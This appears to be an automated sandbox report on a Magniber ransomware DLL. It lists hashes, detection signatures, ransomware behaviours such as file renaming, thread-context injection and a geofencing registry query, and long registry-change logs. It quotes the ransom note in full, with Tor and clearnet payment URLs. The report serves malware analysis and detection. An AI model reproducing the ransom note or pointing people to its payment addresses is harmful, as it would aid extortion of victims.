magniber | 10b9b1d8f6bafd9bb57ccfb1da4a658f10207d566781fa5fb3c4394d283e860e

Resubmissions

12-04-2023 09:01

230412-kzbvhsbb72 10

25-05-2022 10:14

220525-l9q8madfeq 10

Analysis

max time kernel
79s
max time network
91s
platform
windows10_x64
resource
win10-20220414-en
submitted
25-05-2022 10:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

10b9b1d8f6bafd9bb57ccfb1da4a658f10207d566781fa5fb3c4394d283e860e.dll
Size

21KB
MD5

a60c5212d52fe1488d2f82989a2947d2
SHA1

0a744d6c76902d28eb6687d66c18b0a354f29b9d
SHA256

10b9b1d8f6bafd9bb57ccfb1da4a658f10207d566781fa5fb3c4394d283e860e
SHA512

afd14daa5bd9448e09f25d561e8be34e16f93a2825129d165e817a4a2a3ffc339efefd6f26e78c4853acfbce7f51c88b81601324b123d8c377d72da15dcf9327

Score

10^/10

magniber ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://f87440d80eb8cc009dihlxbl.l5nmxg2syswnc6s3724evnip5uktj7msy3pgowkbcidbei3nbysi7ead.onion/dihlxbl Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://f87440d80eb8cc009dihlxbl.uponmix.xyz/dihlxbl http://f87440d80eb8cc009dihlxbl.flysex.space/dihlxbl http://f87440d80eb8cc009dihlxbl.partscs.site/dihlxbl http://f87440d80eb8cc009dihlxbl.codehes.uno/dihlxbl Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://f87440d80eb8cc009dihlxbl.l5nmxg2syswnc6s3724evnip5uktj7msy3pgowkbcidbei3nbysi7ead.onion/dihlxbl

http://f87440d80eb8cc009dihlxbl.uponmix.xyz/dihlxbl

http://f87440d80eb8cc009dihlxbl.flysex.space/dihlxbl

http://f87440d80eb8cc009dihlxbl.partscs.site/dihlxbl

http://f87440d80eb8cc009dihlxbl.codehes.uno/dihlxbl

Signatures

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.execmd.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2104	1148	cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2536	1148	cmd.exe

Modifies extensions of user files 3 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

rundll32.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\CompareExit.raw => C:\Users\Admin\Pictures\CompareExit.raw.dihlxbl	rundll32.exe
File renamed	C:\Users\Admin\Pictures\CloseRedo.png => C:\Users\Admin\Pictures\CloseRedo.png.dihlxbl	rundll32.exe
File renamed	C:\Users\Admin\Pictures\ConfirmRestore.png => C:\Users\Admin\Pictures\ConfirmRestore.png.dihlxbl	rundll32.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

cmd.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Control Panel\International\Geo\Nation cmd.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Control Panel\International\Geo\Nation	cmd.exe

Suspicious use of SetThreadContext 9 IoCs

Processes:

rundll32.exe

description	pid	process
PID 3200 set thread context of 0	3200	rundll32.exe
PID 3200 set thread context of 0	3200	rundll32.exe
PID 3200 set thread context of 0	3200	rundll32.exe
PID 3200 set thread context of 0	3200	rundll32.exe
PID 3200 set thread context of 0	3200	rundll32.exe
PID 3200 set thread context of 0	3200	rundll32.exe
PID 3200 set thread context of 0	3200	rundll32.exe
PID 3200 set thread context of 0	3200	rundll32.exe
PID 3200 set thread context of 0	3200	rundll32.exe

Drops file in Windows directory 4 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exe

description	ioc	process
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdge.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe

Modifies Internet Explorer settings 1 TTPs 5 IoCs

adware spyware

Modify Registry

T1112

Processes:

MicrosoftEdge.exebrowser_broker.exeMicrosoftEdgeCP.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch
Set value (str)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies registry class 64 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exerundll32.exeMicrosoftEdgeCP.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_ieflipahead\Cache = "MicrosoftEdge\\IEFlipAheadCache"
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root\CTLs	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar\WebBrowser	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_iecompat\CacheRel = "MicrosoftEdge\\IECompatCache"
Set value (int)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_Emie = "C:\\Users\\Admin\\AppData\\Local\\Packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\AC\\#!001\\MicrosoftEdge\\User\\Default\\EmieSiteList"
Set value (int)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_Emie = "256"
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\CTLs	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\ChildCapabilities\001 = 53002d0031002d00310035002d0033002d003100000053002d0031002d00310035002d0033002d003900000053002d0031002d00310035002d0033002d0033003200310035003400330030003800380034002d0031003300330039003800310036003200390032002d00380039003200350037003600310036002d003100310034003500380033003100300031003900000053002d0031002d00310035002d0033002d003700380037003400340038003200350034002d0031003200300037003900370032003800350038002d0033003500350038003600330033003600320032002d003100300035003900380038003600390036003400000053002d0031002d00310035002d0033002d0033003800340035003200370033003400360033002d0031003300330031003400320037003700300032002d0031003100380036003500350031003100390035002d003100310034003800310030003900390037003700000053002d0031002d00310035002d0033002d0031003000320034002d0031003000360035003300360035003900330036002d0031003200380031003600300034003700310036002d0033003500310031003700330038003400320038002d0031003600350034003700320031003600380037002d003400330032003700330034003400370039002d0033003200330032003100330035003800300036002d0034003000350033003200360034003100320032002d003300340035003600390033003400360038003100000053002d0031002d00310035002d0033002d0031003000320034002d0033003600320033003800350035003000340031002d0031003800320036003900390039003900350036002d0033003700340037003000360039003800310038002d0033003500320035003200360030003200320033002d0033003700340037003300370034003500310030002d0031003700340036003200370032003600320034002d003900350030003600300031003100360038002d0035003600350035003600330033003100000053002d0031002d00310035002d0033002d0031003000320034002d0032003400300035003400340033003400380039002d003800370034003000330036003100320032002d0034003200380036003000330035003500350035002d0031003800320033003900320031003500360035002d0031003700340036003500340037003400330031002d0032003400350033003800380035003400340038002d0033003600320035003900350032003900300032002d00390039003100360033003100320035003600000053002d0031002d00310035002d0033002d0031003000320034002d0031003500300032003800320035003100360036002d0031003900360033003700300038003300340035002d0032003600310036003300370037003400360031002d0032003500360032003800390037003000370034002d0034003100390032003000320038003300370032002d0033003900360038003300300031003500370030002d0031003900390037003600320038003600390032002d003100340033003500390035003300360032003200000053002d0031002d00310035002d0033002d0031003000320034002d0033003200300033003300350031003400320039002d0032003100320030003400340033003700380034002d0032003800370032003600370030003700390037002d0031003900310038003900350038003300300032002d0032003800320039003000350035003600340037002d0034003200370035003700390034003500310039002d003700360035003600360034003400310034002d003200370035003100370037003300330033003400000053002d0031002d00310035002d0033002d0031003000320034002d0031003700380038003100320039003300300033002d0032003100380033003200300038003500370037002d0033003900390039003400370034003200370032002d0033003100340037003300350039003900380035002d0031003700350037003300320032003100390033002d0033003800310035003700350036003300380036002d003100350031003500380032003100380030002d003100380038003800310030003100310039003300000053002d0031002d00310035002d0033002d0031003000320034002d0033003100350033003500300039003600310033002d003900360030003600360036003700360037002d0033003700320034003600310031003100330035002d0032003700320035003600360032003600340030002d00310032003100330038003200350033002d003500340033003900310030003200320037002d0031003900350030003400310034003600330035002d003400310039003000320039003000310038003700000053002d0031002d00310035002d0033002d0031003000320034002d003100320036003000370038003500390033002d0033003600350038003600380036003700320038002d0031003900380034003800380033003300300036002d003800320031003300390039003600390036002d0033003600380034003000370039003900360030002d003500360034003000330038003600380030002d0033003400310034003800380030003000390038002d003300340033003500380032003500320030003100000053002d0031002d00310035002d0033002d0031003000320034002d0031003600390032003900370030003100350035002d0034003000350034003800390033003300330035002d003100380035003700310034003000390031002d0033003300360032003600300031003900340033002d0033003500320036003500390033003100380031002d0031003100350039003800310036003900380034002d0032003100390039003000300038003500380031002d00340039003700340039003200390039003100000053002d0031002d00310035002d0033002d0031003000320034002d003200320030003000320032003700370030002d003700300031003200360031003900380034002d0033003900390031003200390032003900350036002d0034003200300038003700350031003000320030002d0032003900310038003200390033003000350038002d0033003300390036003400310039003300330031002d0031003700300030003900330032003300340038002d003200300037003800330036003400380039003100000053002d0031002d00310035002d0033002d0031003000320034002d003500320038003100310038003900360036002d0033003800370036003800370034003300390038002d003700300039003500310033003500370031002d0031003900300037003800370033003000380034002d0033003500390038003200320037003600330034002d0033003600390038003700330030003000360030002d003200370038003000370037003700380038002d003300390039003000360030003000320030003500000053002d0031002d00310035002d0033002d0031003000320034002d0031003800360034003100310031003700350034002d003700370036003200370033003300310037002d0033003600360036003900320035003000320037002d0032003500320033003900300038003000380031002d0033003700390032003400350038003200300036002d0033003500380032003400370032003400330037002d0034003100310034003400310039003900370037002d003100350038003200380038003400380035003700000053002d0031002d00310035002d0033002d0031003000320034002d0034003000340034003800330035003100330039002d0032003600350038003400380032003000340031002d0033003100320037003900370033003100360034002d003300320039003200380037003200330031002d0033003800360035003800380030003800360031002d0031003900330038003600380035003600340033002d003400360031003000360037003600350038002d003100300038003700300030003000340032003200000053002d0031002d00310035002d0033002d0031003000320034002d0032003900320032003200390036003200360031002d0031003600340037003400380032003700360038002d0032003000310037003000390031003100340036002d0033003800350038003600360037003000360038002d0034003100330035003600360033003600360032002d0032003900330031003900380035003800390034002d0031003600320037003800320030003900320035002d00380031003800330036003600340033003100000053002d0031002d00310035002d0033002d0031003000320034002d0032003400340030003300300036003300370037002d0033003300300034003600310031003000340039002d0031003400390034003300390039003000370031002d0031003100360031003900320036003200320033002d003100360033003900310032003300380034002d0031003400330037003000360035003700370033002d0031003400350036003800320030003500360030002d00320033003900300031003500380031003900360000000000
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\iedownload\CachePrefix = "iedownload:"
Set value (str)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_EmieUserList\Cach = "C:\\Users\\Admin\\AppData\\Local\\Packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\EmieUserList"
Set value (data)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\ChildCapabilities\006 = 53002d0031002d00310035002d0033002d003100000053002d0031002d00310035002d0033002d003900000053002d0031002d00310035002d0033002d0033003200310035003400330030003800380034002d0031003300330039003800310036003200390032002d00380039003200350037003600310036002d003100310034003500380033003100300031003900000053002d0031002d00310035002d0033002d003700380037003400340038003200350034002d0031003200300037003900370032003800350038002d0033003500350038003600330033003600320032002d003100300035003900380038003600390036003400000053002d0031002d00310035002d0033002d0033003800340035003200370033003400360033002d0031003300330031003400320037003700300032002d0031003100380036003500350031003100390035002d003100310034003800310030003900390037003700000053002d0031002d00310035002d0033002d0031003000320034002d0031003000360035003300360035003900330036002d0031003200380031003600300034003700310036002d0033003500310031003700330038003400320038002d0031003600350034003700320031003600380037002d003400330032003700330034003400370039002d0033003200330032003100330035003800300036002d0034003000350033003200360034003100320032002d003300340035003600390033003400360038003100000053002d0031002d00310035002d0033002d0031003000320034002d0033003600320033003800350035003000340031002d0031003800320036003900390039003900350036002d0033003700340037003000360039003800310038002d0033003500320035003200360030003200320033002d0033003700340037003300370034003500310030002d0031003700340036003200370032003600320034002d003900350030003600300031003100360038002d0035003600350035003600330033003100000053002d0031002d00310035002d0033002d0031003000320034002d0032003400300035003400340033003400380039002d003800370034003000330036003100320032002d0034003200380036003000330035003500350035002d0031003800320033003900320031003500360035002d0031003700340036003500340037003400330031002d0032003400350033003800380035003400340038002d0033003600320035003900350032003900300032002d00390039003100360033003100320035003600000053002d0031002d00310035002d0033002d0031003000320034002d0031003500300032003800320035003100360036002d0031003900360033003700300038003300340035002d0032003600310036003300370037003400360031002d0032003500360032003800390037003000370034002d0034003100390032003000320038003300370032002d0033003900360038003300300031003500370030002d0031003900390037003600320038003600390032002d003100340033003500390035003300360032003200000053002d0031002d00310035002d0033002d0031003000320034002d0033003200300033003300350031003400320039002d0032003100320030003400340033003700380034002d0032003800370032003600370030003700390037002d0031003900310038003900350038003300300032002d0032003800320039003000350035003600340037002d0034003200370035003700390034003500310039002d003700360035003600360034003400310034002d003200370035003100370037003300330033003400000053002d0031002d00310035002d0033002d0031003000320034002d0031003700380038003100320039003300300033002d0032003100380033003200300038003500370037002d0033003900390039003400370034003200370032002d0033003100340037003300350039003900380035002d0031003700350037003300320032003100390033002d0033003800310035003700350036003300380036002d003100350031003500380032003100380030002d003100380038003800310030003100310039003300000053002d0031002d00310035002d0033002d0031003000320034002d0033003100350033003500300039003600310033002d003900360030003600360036003700360037002d0033003700320034003600310031003100330035002d0032003700320035003600360032003600340030002d00310032003100330038003200350033002d003500340033003900310030003200320037002d0031003900350030003400310034003600330035002d003400310039003000320039003000310038003700000053002d0031002d00310035002d0033002d0031003000320034002d003100320036003000370038003500390033002d0033003600350038003600380036003700320038002d0031003900380034003800380033003300300036002d003800320031003300390039003600390036002d0033003600380034003000370039003900360030002d003500360034003000330038003600380030002d0033003400310034003800380030003000390038002d003300340033003500380032003500320030003100000053002d0031002d00310035002d0033002d0031003000320034002d0031003600390032003900370030003100350035002d0034003000350034003800390033003300330035002d003100380035003700310034003000390031002d0033003300360032003600300031003900340033002d0033003500320036003500390033003100380031002d0031003100350039003800310036003900380034002d0032003100390039003000300038003500380031002d00340039003700340039003200390039003100000053002d0031002d00310035002d0033002d0031003000320034002d003200320030003000320032003700370030002d003700300031003200360031003900380034002d0033003900390031003200390032003900350036002d0034003200300038003700350031003000320030002d0032003900310038003200390033003000350038002d0033003300390036003400310039003300330031002d0031003700300030003900330032003300340038002d003200300037003800330036003400380039003100000053002d0031002d00310035002d0033002d0031003000320034002d003500320038003100310038003900360036002d0033003800370036003800370034003300390038002d003700300039003500310033003500370031002d0031003900300037003800370033003000380034002d0033003500390038003200320037003600330034002d0033003600390038003700330030003000360030002d003200370038003000370037003700380038002d003300390039003000360030003000320030003500000053002d0031002d00310035002d0033002d0031003000320034002d0031003800360034003100310031003700350034002d003700370036003200370033003300310037002d0033003600360036003900320035003000320037002d0032003500320033003900300038003000380031002d0033003700390032003400350038003200300036002d0033003500380032003400370032003400330037002d0034003100310034003400310039003900370037002d003100350038003200380038003400380035003700000053002d0031002d00310035002d0033002d0031003000320034002d0034003000340034003800330035003100330039002d0032003600350038003400380032003000340031002d0033003100320037003900370033003100360034002d003300320039003200380037003200330031002d0033003800360035003800380030003800360031002d0031003900330038003600380035003600340033002d003400360031003000360037003600350038002d003100300038003700300030003000340032003200000053002d0031002d00310035002d0033002d0031003000320034002d0032003900320032003200390036003200360031002d0031003600340037003400380032003700360038002d0032003000310037003000390031003100340036002d0033003800350038003600360037003000360038002d0034003100330035003600360033003600360032002d0032003900330031003900380035003800390034002d0031003600320037003800320030003900320035002d00380031003800330036003600340033003100000053002d0031002d00310035002d0033002d0031003000320034002d0032003400340030003300300036003300370037002d0033003300300034003600310031003000340039002d0031003400390034003300390039003000370031002d0031003100360031003900320036003200320033002d003100360033003900310032003300380034002d0031003400330037003000360035003700370033002d0031003400350036003800320030003500360030002d00320033003900300031003500380031003900360000000000
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\CRLs	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\ms-settings\shell	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DOMStorage	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery	MicrosoftEdge.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_iecompat
Set value (str)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-3624051433-2125758914-1423191267-1740899205-1073925389-3782572162-737981194\Children\S-1-15-2-362405 = "121"
Set value (data)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\Next Rating Prompt = 70e64a706081d801	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust\CRLs	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\MicrosoftEdge_iecompat\CacheRep = "0"
Set value (int)	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache\iedownload\CacheOptions = "9"
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Extensible Cache	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-4236190499-842014725-259441995-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	MicrosoftEdge.exe
